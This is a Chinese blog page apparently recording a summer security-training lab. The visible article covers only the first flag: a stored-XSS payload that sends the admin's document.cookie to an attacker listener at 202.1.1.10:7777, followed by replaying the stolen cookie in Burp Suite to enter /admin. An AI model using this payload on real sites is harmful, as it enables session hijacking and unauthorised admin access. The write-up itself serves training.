<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Luxf1y">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/09/08/暑期实训/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="暑期实训1、flag1在www.qianxin.com的网站下，打开任一文章，输入入 alert(1)；；通过回显可以判断其存在xss漏洞；  在本地搭建web服务，开放在7777端口上；并查看自身ip为202.1.1.10；  在之前文章的输入框中，输入如下代码；这句恶意的代码如果被对方的管理员访问后，会将其cookie发送给本地的web服务中；在cmd窗口中可以看到对方的管理员访问了评论，并带">
<meta property="og:type" content="article">
<meta property="og:title" content="Luxf1y&#39;s blog">
<meta property="og:url" content="http://example.com/2023/09/08/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD/index.html">
<meta property="og:site_name" content="Luxf1y&#39;s blog">
<meta property="og:description" content="暑期实训1、flag1在www.qianxin.com的网站下，打开任一文章，输入入 alert(1)；；通过回显可以判断其存在xss漏洞；  在本地搭建web服务，开放在7777端口上；并查看自身ip为202.1.1.10；  在之前文章的输入框中，输入如下代码；这句恶意的代码如果被对方的管理员访问后，会将其cookie发送给本地的web服务中；在cmd窗口中可以看到对方的管理员访问了评论，并带">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%201.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%202.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%203.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%204.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%205.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%206.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%207.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%208.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%209.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2010.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2011.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2012.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2013.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2014.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2015.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2016.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2017.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2018.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2019.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2020.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2021.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2022.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2023.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2024.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2025.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2026.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2027.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2028.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2029.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2030.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2031.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2032.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2033.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2034.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2035.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2036.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2037.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2038.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2039.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2040.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2041.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2042.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2043.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2044.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2045.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2046.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2047.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2048.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2049.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2050.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2051.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2052.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2053.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2054.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2055.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2056.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2057.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2058.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2059.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2060.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2061.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2062.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2063.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2064.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2065.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2066.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2067.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2068.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2069.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2070.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2071.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2072.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2073.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2074.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2075.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2076.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2077.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2078.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2079.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2080.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2081.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2082.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2083.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2084.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2085.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2086.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2087.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2088.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2089.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2090.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2091.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2092.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2093.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2094.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2095.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2096.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2097.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2098.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%2099.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20100.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20101.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20102.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20103.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20104.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20105.png">
<meta property="og:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%20106.png">
<meta property="article:published_time" content="2023-09-08T09:28:31.549Z">
<meta property="article:modified_time" content="2023-09-08T01:26:14.000Z">
<meta property="article:author" content="Luxf1y">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
        Luxf1y&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":true,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Welcome to Luxf1y's blog","subtitle":{"text":[],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"links":{"github":"https://github.com/luyifei1017","bilibili":"https://space.bilibili.com/382296737?spm_id_from=333.1007.0.0","steam":"https://steamcommunity.com/profiles/76561198314990237/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.4.4","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="swup-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="http://example.com/">
                
                Luxf1y&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer w-full absolute top-0 left-0 bg-background-color">
        <ul class="drawer-navbar-list flex flex-col justify-start items-center">
            
                
                    <li class="drawer-navbar-item text-base my-1.5 flex justify-center items-center">
                        <a class="rounded-3xl py-1.5 px-5 hover:border hover:!text-primary active:!text-primary group " 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container">
    <div class="article-content-container">

        <div class="article-title">
            
                <h1 class="article-title-regular"></h1>
            
            </div>
            
                    
        
        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/astralis.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">Luxf1y</span>
                        
                            <span class="author-label">Lv1</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-09-08 17:28:31</span>
        <span class="mobile">2023-09-08 17:28:31</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-09-08 09:26:14</span>
            <span class="mobile">2023-09-08 09:26:14</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body">
            <h1 id="暑期实训"><a href="#暑期实训" class="headerlink" title="暑期实训"></a>暑期实训</h1><h3 id="1、flag1"><a href="#1、flag1" class="headerlink" title="1、flag1"></a>1、flag1</h3><p>在<a class="link"   target="_blank" rel="noopener" href="http://www.qianxin.com的网站下,打开任一文章,输入入/" >www.qianxin.com的网站下，打开任一文章，输入入 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a><script>alert(1)；</script>；通过回显可以判断其存在xss漏洞；</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled.png"
                      alt="Untitled"
                ></p>
<p>在本地搭建web服务，开放在7777端口上；并查看自身ip为202.1.1.10；</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%201.png"
                      alt="Untitled"
                ></p>
<p>在之前文章的输入框中，输入如下代码；这句恶意的代码如果被对方的管理员访问后，会将其cookie发送给本地的web服务中；在cmd窗口中可以看到对方的管理员访问了评论，并带回了对方的cookie。</p>
<div class="highlight-container" data-rel="Jsx"><figure class="iseeu highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="variable language_">window</span>.<span class="title function_">open</span>(<span class="string">&#x27;[http://202.1.1.10:7777/?msg=&#x27;</span>+<span class="variable language_">document</span>.<span class="property">cookie</span>](<span class="attr">http</span>:<span class="comment">//202.1.1.10:7777/?msg=%27+document.cookie))&lt;/script&gt;</span></span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%202.png"
                      alt="Untitled"
                ></p>
<p>在burpsuite中将浏览器中所有的cookie都替换成获取到的admin的cookie值。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%203.png"
                      alt="Untitled"
                ></p>
<p>登录<a class="link"   target="_blank" rel="noopener" href="http://www.qianxin.com/admin" >http://www.qianxin.com/admin <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/%E6%9A%91%E6%9C%9F%E5%AE%9E%E8%AE%AD%20a8dc8eff0d794f83b4405b1251a40165/Untitled%204.png"
                      alt="Untitled"
                ></p>
